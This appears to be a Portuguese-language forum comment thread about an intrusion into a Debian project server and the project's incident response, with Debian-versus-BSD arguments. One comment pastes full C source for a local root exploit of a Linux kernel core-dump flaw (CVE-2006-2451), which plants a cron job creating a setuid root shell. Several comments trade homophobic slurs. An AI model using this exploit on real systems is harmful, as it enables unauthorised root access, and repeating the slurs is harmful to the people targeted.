Sensatez: Concordo plenamente, o ato de re-instalar o servidor foi realmente sensato, quem garante que outros serviços e partes do sistema não foi comprometido ?

Desde que tenham backup das configurações e outros arquivos cruciais, nada será perdido, e os serviços poderão voltar à ativa em pouco tempo.

É a velha lei do bom senso (com a de Murphy por trás - na má conotação).

Utilizo Debian em meus clientes/projetos, isso não abalará minha confiança na distro.

--
..Got to ride that rocking horse.

Sim, foi a segunda: Sim, foi a segunda invasão:
http://www.debian.org/News/2003/20031121

Senhas fracas... exploit local para virar root... nada de novo, por enquanto :-)

Eu penso que algém deve ser "patrocinado" para fazer algo desse tipo...

patrocinado ???: Usar senhas fracas para invadir é um dos meios mais antigos ! Seria somente configurar uma boa política de senhas ali e este problema não teria acontecido.


--
Gustavo Picoloto
http://cenoura.homelinux.com

Acho que ele quis dizer que: Acho que ele quis dizer que 'alguém' (lá do mundo do software proprietério) teria feito isso.

Próximo release: Será que esse compromentimento vai atrasar o próximo release, ou podemos esperar a próxima versão estável para 2012?

Foi vulnerabilidade do kernel: A conta do desenvolvedor ter cedido acesso à máquina é apenas parte da história. O invasor utilizou de uma vulnerabilidade do kernel, que já foi corrigida. O interessante é que se o Debian usasse o debian estável, nada disto teria ocorrido.


Thadeu Penna
Prof.Adjunto IV - Instituto de Física - UFF
Linux User #50500 (counter.li.org)
Debian GNU/Linux alpha-amd64-i386

a bela filosofia da debian: a bela filosofia da debian de utilizar password e não ssh-keys dão sempre otimos resultado :|

impedir a criação de core dump na policy ( limits.conf ) ?

Render o cron.d imutavél?
chattr +i /etc/cron.d

O exploit utilizado foi algo do tipo:

/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer (main PoC code) */
/* - RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/

#include
#include
#include
#include
#include
#include
#include
#include

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");

corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);

printf("[*] Creating Cron entry\n");

if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}

kill(child, SIGSEGV);

printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);

printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -i");
}

---

bruteforce em um desenvolvedor, exploit local e uala...

bom, esperando nao gerar flames...

Debian é Debian em qualquer: Debian é Debian em qualquer situação.

Vários outros projetos já foram prejudicados por isso e nem por isso a distro ou seus mantenedores foram desmerecidos e também o Windows é constantemente invadido em tudo quanto é parte do mundo e nem por isso ele passou deixou de ser usado (isso sim é uma pena ;-) ).

O fato de se dizer que os servidores Debian foram invadidos com certeza tem um peso muito maior do que dizer que os servidores do projeto Kurumin ou Kalango o foram (sem flames e sem desmerecer a estas duas distros), mas a verdade é que quanto mais popular é uma distro maior as chances do problema se tornar público.

---
Se Tostines fosse GPL todo mundo saberia o seu segredo!
User Linux: #253605
http://gtk-br.codigolivre.org.br

DINOVO??????!!!!: Puxa, mas logo com o Linux que é TÃÃÃÃÃÃÃÃO seguro!!!

Hahahahaha!!! Sonhar não paga taxa, né?

Ow bichinha paga pau da M$...: Ow bichinha paga pau da Micro$oft, vai aprender um pouco de informática ao invez de ficar enchendo o saco.... picareta!
é um saco esses paga pau de ruindows q tem raiva de linux pq nao conseguem fazer uma listagem de arquivos. só sabe usar gui.... viadinho -.-

Pra quem não quer ou não: Pra quem não quer ou não pode esperar, existem centenas de outras distros, que liberam versões estáveis a cada 6 meses.

Não custa nada, ou talvez até custe alguma coisa, manter os pacotes instalados na sua máquina atualizados. Caso dinheiro não seja problema, há a possibilidade pagar por assitência (RedHat, Mandriva, Gentoo, Suse, Ubuntu, etc...). Com certeza existem distribuições interessadas em receber um belo pagamento no final do mês por uma manutenção ou liberação de correções mais ágeis para quem se dispuser a pagar por isso e não quer ou não pode contar com administradores de sistemas/redes para fazer esse trabalho sozinhos.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Carlos Wagner - São Luís / MA

P.S.: As palavras acima fazem parte da minha visão do assunto e não pretendem ser, de modo algum, a verdade absoluta sobre o mesmo.

Obrigado!

Tambem gosto de Debian: O problema é que apenas efetuar uma reinstalação e um backup não resolve o problema. Se a brecha não for fechada o problema volta...

O mais importante é identificar a forma de ataque e trabalhar na prevenção.

Linux user #226380
"Linux é amigável... Ele apenas sabe escolher os amigos."

Obscuro: Esse exploit permite que usuários locais executem programas com privilégios de root.

Não entendi... quer dizer que a invasão partiu da rede local?

Este servidor apenas hospedava os pacotes ou também estaria habilitado a gerar autenticação dos pacotes? O mecanismo de autenticação dos pacotes tambem estaria comprometido?

Linux user #226380
"Linux é amigável... Ele apenas sabe escolher os amigos."

pay pal: Você assina como "caralhudo" e eu que sou bichinha? Quem está com obsessões fálicas é você. E eu jamais citei Windows. Só fiz pouco de mais esta invasão do Debian, que é Linux, que adora botar banca dizendo que é "seguro" enquanto eu acho que "sistema seguro" ainda não existe. Foi você que mencionou Windows, com tanta fúria. Evidentemente, o paga pau aqui é você. E eu não acho que você seja bichinha, viadinho nem pederasta só porque paga pau pro Linux. Só acho que você tem um QI de molusco. É bem diferente.

Creio que os administradores: Creio que os administradores dos servidores do Debian não são tão amadores a ponto de somente restaurarem os backups anteriores à invasão. Com certeza eles irão aplicar medidas que aumentará o nível de segurança. Isso talvez até prejudique alguns dos usuários desse servidor (usuários comuns qye fazem apenas downloads e desenvolvedores que publicam correções), mas como já havia dito num post de outra notícia, é "apenas" um servidor, e não o sistema inteiro de repositório (assim espero :).

A partir do momento que o servidor atingido saiu do ar, com certeza alguém deve ter percebido oproblema e alterado seus sources.list para outros repositórios. Se não o fez deverá esperar um pouco para voltar a ter suas atualizações.

Acho que muitos, e não falo apenas de usuários leigos e pseudo administradores de redes e sistemas, mas também alguns de nós, não depositam confiança suficiente em vários dos projetos que utilizamos, acnahdo, talvez insconcientemente que quem desenvolve/usa Linux e SL não deve saber o que está fazendo ou não usa "coisa melhor" por que não pode pagar.

Sei que não é o seu caso, escovadordebit, mas não há dúvidas de que tem muita gente assim entre os "ferrenhos" defensores do GNU/Linux.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Carlos Wagner - São Luís / MA

P.S.: As palavras acima fazem parte da minha visão do assunto e não pretendem ser, de modo algum, a verdade absoluta sobre o mesmo.

Obrigado!

Falou o grande babaca: Falou o grande babaca agora.
Como que pode existir alguêm tão tapado como este tigo cruz credo!

hehehe: Tenho que concordar com vc, Eliseu.
Em partes, claro.
Principalmente na parte do QI de molusco..rs... você emitiu uma opinião e logo depois um ser biológico com papo típico de fanático slacker despejou um monte de ofensas....

Será que ele também é petista? Molusco, petista... petista, molusco...
:D :D :D

hehehehehe: Não acho que o Debian seja o melhor em todas as situações. Nunca me demonstrou ser realmente estável. Recomendo-o para usuários finais, pois ele (e as distribuições baseadas nele) são extremamente fáceis. O que tira o controle da mão do administrador de sistema. Apt-get pra cá, apt-get pra lá, e o humano sai do controle.

Sou mais Slackware.


Mas vamos parar de trollar e discutir sobre o problema real? ;-)

hua! um vem falar mal do: hua! um vem falar mal do Linux no br-linux.org, e outro me entra como Henry (espero meeesmo que esse nao seja seu nome, ou entao sua mae gostaria que vc fosse viado - retiro o que disse pra qualquer usuario serio de Linux que leia esse site: isso so serve pra ele)... cada um que aparece por aqui... super respostas que vcs deram pro cara, ne? vcs dois devem ser viadinhos mesmo, pois nem pra entender que as ofensas do cara foram mais pela falta de nocao do primeiro idiota (que, claramente, tem muito menos experiencia em informatica que a maior parte do pessoal que frequenta o site) de vir no br-linux.org tirar sarro do Linux vcs tiveram capacidade...
meu... dizer que um sistema eh 100% seguro, eh o mesmo que dizer que vcs dois sao homens: talvez vcs parecam ser, mas com certeza (sim, com certeza) vcs nao sao; mas dizer que o Linux eh o mais seguro eh ooooutra coisa (como diria a primeira bicha)...

so to alimentando essas bosta pq tenho nada pra fazer, ngm vai ler essa merda ate aqui mesmo (ta todo mundo cansado dessas coisas)...

ah sim! nem tenho conselhos pra vcs (do tipo de "estude mais", "aprenda a usar qualquer outra coisa que nao seja Windows" e tal)... desculpa! hua!

sera?: Ah... sera cara? Acho o Debian Stable a versao mais estavel de Linux que existe... So a politica infinita da distribuicao estavel ja garante bastante coisa, acho...

apt eh so uma ferramenta muito mao-na-roda: mais fundamental (no sentido de "mais braco") que ela, apenas compilando mesmo... nao vejo no apt um programa que tira o poder do root... nem grafico ele eh...

quanto ao problema real: acho normal... acontece... do jeito que esse servidor deve ser visado, duas invasoes em toda a historia (se o numero realmente for o real) eh nada na minha opiniao... mas como Debian eh uma distro de comunidade, todos ficam sabendo... e como ela eh uma das maiores (se nao a maior), todos ficam sabendo... e como ela eh uma das mais importantes (se nao a mais importante - desculpa, isso nao eh inicio de flame, eh apenas minha opiniao), todos ficam sabendo...

falows (desculpa se iniciei flame sem querer)...

Concordo que a política de: Concordo que a política de desenvolvimento do Debian influencie na qualidade do produto final, e que a falta de atualizações "cosméticas" também.

Os softwares contidos no Debian são realmente defasados em relação aos de outras distribuições, mas o que importa, é que eles sejam funcionais e sirvam bem.

Tenho vários servidores Debian (desde o lançamento do Sarge), nunca tive problemas por questões de softwares mais antigos (só uso os do repositório stable, qualquer outro está fora de cogitação).


Em relação ao servidor hackeado, só gerou toda essa polêmica pelo fato da notícia ter se tornado pública (mais um política Debian), quem garante que servidores de outras distribuições também não foram ao longo do tempo ?

Vide também servidores que usam sistemas operacionais proprietários.

O IIS de um ex-cliente meu foi/está hackeado, vejam que maravilha:

"SegmentationFault Group - S4P0 was here..."

--
..Got to ride that rocking horse.

FreeBSD vs Linux: Como nosso colega disse, o Debian para usuário final é muito bom, mas para ambientes de produção não gosto e nem indico.
O Linux é bom para que quer se iniciar no mundo *NIX, mas um dos grandes problemas é o enorme e crescente número de distribuições que aparecem por ai causando uma falta de padronização e confusão geral. Deixei de usar o Linux e um dos motivos foi a falta de padronização.
FreeBSD é FreeBSD em qualquer lugar, segue um padrão, o projeto conta com desenvolvedores de elite experientes em UNIX. O FreeBSD possui uma documentação muito ampla, na hora de solucionar problemas é mais fácil, pois como disse é um sistema padronizado e todos falam a mesma língua.
Um sistema que não precisa de marketing agressivo para se promover, pois seu marketing se faz pela sua qualidade.
Ele possui um sistema de pacotes que nenhuma distribuição Linux possui, atualizações constantes, mecanismos que apontam as vulnerabilidades nos pacotes instalados e ainda faz referências de tais vulnerabilidades, sem contar que é muito fácil atualizar os pacotes.
Uma das coisas mais interessantes no FreeBSD é que o projeto não mantém só o KERNEL, ele mantém o sistema base também e no Linux não é assim devido a falta de um padrão.
Segundo a consultoria, Netcraft o FreeBSD está na lista dos endereços mais confiáveis no que diz respeito à disponibilidade de serviços. O endereço mais confiável é o iPowerWeb , que opera sob base FreeBSD. Dos 10 endereços de Internet mais confiáveis segundo a Netcraft, 4 rodam em FreeBSD, 3 em Linux e dois em Windows 2003 Server.
http://www.fug.com.br/content/view/106/54/

Não estou desmerecendo o Linux, e sei que ele também é confiável desde que bem implementado e mantido e uma das coisas boas do Linux são as portas que ele abre para que os usuários do Windows se libertem do monopólio que a Micro$oft criou, digamos que o regime político da M$ é uma ditadura. ];-)

Mas para os usuários *NIX mais avançados e experientes o FreeBSD ou OpenBSD são os sistemas mais indicados e escolhidos.
Muitos sistemas como Linux, MacOS X, Windows, Solaris e outros UNIX comerciais utilizam códigos BSD e é por isso que ele é respeitado e esta desde os primórdios dos sistemas operacionais.

É usar e se apaixonar...

Um abraço a todos.

segurança.. a Debian não tem isso..: estou inserindo comentário(s) lidos em lista de FreeBSD, que exemplifica bem a IRRESPONSABILIDADE dos administradores do projeto Debian, que antes tínhamos como exemplo de segurança. Sem flames, mas façam uma leitura apurada dêste comentário(s):
:=== begin
> imagine vc....... inumeros gerentes de CPD... que tem seus servers linux
> rodando
>
> com ATUALIZACOES no cron
>
> e hoje acordaram com codigos ilicitos em seus servers..... E NEM TEM
> NOCAO DISTO
>
> o que tudo isto pode causar
>
> na minha visao... isto nao eh apenas falha de seguranca.... e SIM
> IRRESPONSABILIDADE/INCOPETENCIA de quem toca o projeto

Nossa se voce acha so o fato de ser invadidos irresponsabilidade e
incompetencia, nem imagino sua conclusao quando souber que:

- Apenas os logs do servidor foram copiados
- A maquina foi formatada/reinstalada
- Nao ha qualquer hipotese de analise forense pq o HD nao foi isolado
- As unicas analises sao baseadas nos log files
- Log files sao facilmente modificados
- Todas as respostas oficiais sao baseadas em analise de logs, a saber:
- O servidor ficou comprometido das 2 as 4 da manha +/-
- Nao deu tempo de haver modificacao no CVS
- Ah, esse servidor tambem era servidor CVS

- Quantas distros baseadas nessa distro usam esse CVS?
- Quantos acesso ao CVS houve durante o tempo comprometido
- Acesso de quem, durante o tempo comprometido?

Como se pode notar, as informacoes oficiais nao sao seguras. Nao se
sabe seguramente o tempo que o servidor ficou comprometido. Eu nao
acredito em logs em ambiente ja comprometido. Alguem aqui acredita?

Analise forense e o minimo de seriedade necessaria. Nao da nem para
passar um lazzarus nesse servidor mais, pra saber que arquivos possam
ter sido adicionados/removidos no meio tempo.

E tem gente que acha que "formatar" e uma decisao acertada.

Estamos retirando debian de onde temos servico critico aqui na Saude
por causa desse incidente. Poucos vao ficar ainda, mas sera questao de
tempo ate retirarmos de onde pudermos.

Nao por causa do comprometimento, mas pela falta de sensatez com que a
questao tem sido tratada. O Projeto OpenBSD tambem ja foi
comprometido, apesar da base comprometida ser em Solaris e nao
OpenBSD, foi feita uma analise minuciosa e detalhada das causas e
consequencias do acesso indevido. No caso do OpenBSD foi uma mostra de
como as coisas deve ser feitas. A mesma coisa quando houve
comprometimento de um servidor do projeto Slackware no passado. As
acoes foram exemplares.

No caso do Debian, alem de ser a segunda vez, a falta de
responsabilidade e de clareza com que as informacoes estao sendo
passadas, nao nos dao confianca.

Ah, apenas um detalhe: eu estou especialmente preocupado pois faco
sincronia periodica por CVS com esse servidor.

:=== end

os nomes foram removidos. Mas podem ser consultados no histórico da lista:
http://www.fug.com.br/historico/html/freebsd/ sob o título "Seguranca em Linux ???"

FUD: Agora você já está espalhando FUD. Os BSDs não são mais seguros que o Linux nem vice-versa. Qualquer sistema é uma peneira se for mal configurado. PODE SER que os administradores e mantenedores dos BSDs sejam mais competentes e administrem melhor as coisas, mas isso não faz Debian menos seguro ou FreeBSD mais seguro depois que chega às mãos do usuário final. Nenhuma distro tem controle sobre os atos dos usuários. No máximo, pode fazer aquela criancice dos Debians de fazer todo o possível para esconder o login de root dos usuários. Mas isso não é segurança.

O meu PALPITE, baseado nas impressões obtidas com muita coisa que vi até hoje, seria que o Debian é GRANDE demais, um balaio de gatos de mandos e desmandos, e que por isso evolui tão devagar e sofre muitos incidentes de percurso. Mas nada impede um usuário competente de configurá-lo corretamente.

Você gosta tanto do FreeBSD, pois eu já prefiro o OpenBSD e o NetBSD, que têm comunidades ainda menores. O FreeBSD sempre me pareceu meio tumultuado, como o Debian. Tenho visto muitas distros e comunidades pequenas e programadores solitários fazer um trabalho formidável, enquanto os projetos que envolvem muita gente (Debian, FreeBSD, Windows) parecem enfrentar problemas com mais frequência.

Mas eu admito que estou especulando e manifestando uma impressão geral que tenho das coisas. Talvez o número de pessoas envolvidas seja apenas coincidência.

Se você quer retirar o Debian de todos os seus serviços críticos, é direito seu. Até recomendo. Nunca gostei do Debian e seus derivados. Mas vamos deixar claro que você está dando este passo pelo motivo errado.

Mais seguro?: Como nosso amigo disse, qualquer sistema quando mau configurado vira um problema,o FreeBSD que também é uma variante do mundo *NIX, como o AIX, HP-UX, NetBSD, pode também ser um problema. a vantagem do linux é que com a quantidade de cabeça de cabeças pensantes se torna capaz de evoluir mais rapido que os outros, a desvantagem é que tambem pode ter formatos diferentes, dependendo de cada distribuição. Agora um bom administrador quer ter o controle sobre a máquina, atualizações automáticas nem no Windows se deve deixar, e no dia que os repositorios do ports derem problemas nem Madre Teresa ajuda os BSD com administradores deste tipo.

Relação duvidosa: Eu tambem não quero trolar, mas juro que não entendo esta relação entre um sistema ser bom ou não e sua facilidade de uso.
Quer dizer que quando um sistema começa a ser fácil de usar ele deve ser deixado de lado porque o usuário final está atingindo o nirvana?

Eu quero um sistema rápido, estável, moderno e flexível. Se for fácil de usar melhor.

Não entendo porque o administrador perdeo controle com o Debian. Só porque ele tem à disposição o apt? Isso é flexibilidade. Se ele quiser pode compilar a partir dos fontes como qualque usuário Slackware.

Mas sem trolar meeeesmo. cada um deve usar a distro que se sinta mais a vontade.

Linux user #226380
"Linux é amigável... Ele apenas sabe escolher os amigos."

Sobre o Post do Irado com o comentario do FUG: O que foi criticado no caso nao foi o Debian em si, foi a maneira como o time de seguranca respondeu ao problema.

A ideia genial deles foi salvar os logs e formatar a maquina. Nada de analise forense, de olhar o que pegou no sistema, por onde entrou, o que aprontou, saber o que mais foi modificado, nada.

salvaram apenas os LOGS de uma maquina com o ROOT COMPROMETIDO. Ate um script kiddie sabe apagar as coisas dos logs ou edita-los com vi, emacs, joe, whatever.

No meu entendimento, a critica foi a maneira um tanto quanto infantil como o debian lidou com o problema, mostrando que estavam despreparados para manter uma base solida e segura, ou que se desesperaram na hora "H".

Deveria ter-se isolado o disco/maquina (ou discos/maquinas) comprometido, e colocado outro pra instalar os servicos de novo. Foi basicamente "lero lero, vc invade a gente poe de volta em 1/2 hora HAHAHA". Nos outros exemplos citados ali, o do OpenBSD e do Slack, as maquinas comprometidas foram isoladas para analise, e outras assumiram seu lugar, permitindo analise profunda das maneiras que foram usadas pra entrar na mesma.

Eu pessoalmente nao gosto de debian e nao o usaria nem de brincadeira, mas tem gente que gosta, e quem gosta deveria ficar atento e se perguntar se eh esse tipo de procedimento que se espera do time de seguranca da manutencao da sua distro preferida.

Ainda em tempo, a critica NAO EH do irado, como ele mesmo disse, mas foi o texto de uma mensagem que circulou na FUG.

Não da pra ter certeza de nada.: Eu não participo dos bastidores do projeto Debian, mas em termos de segurança muitas vezes em casos de invasão, não se alardeia a estratégia adotada.

Eu por exemplo gostaria de saber a fundo os mecanismos de proteçâo que o pessoal do Debian utiliza (até para saber qual o nível de proteção utilizado), mas reconheço que uma das estratégias básicas de segurança é justamente não revelar a estratégia.

Só quem pode saber os reais procedimentos adotados neste caso são os próprios administradores. Quem sabe se o pessoal não esta com um honey pot prontinho esperando?

Linux user #226380
"Linux é amigável... Ele apenas sabe escolher os amigos."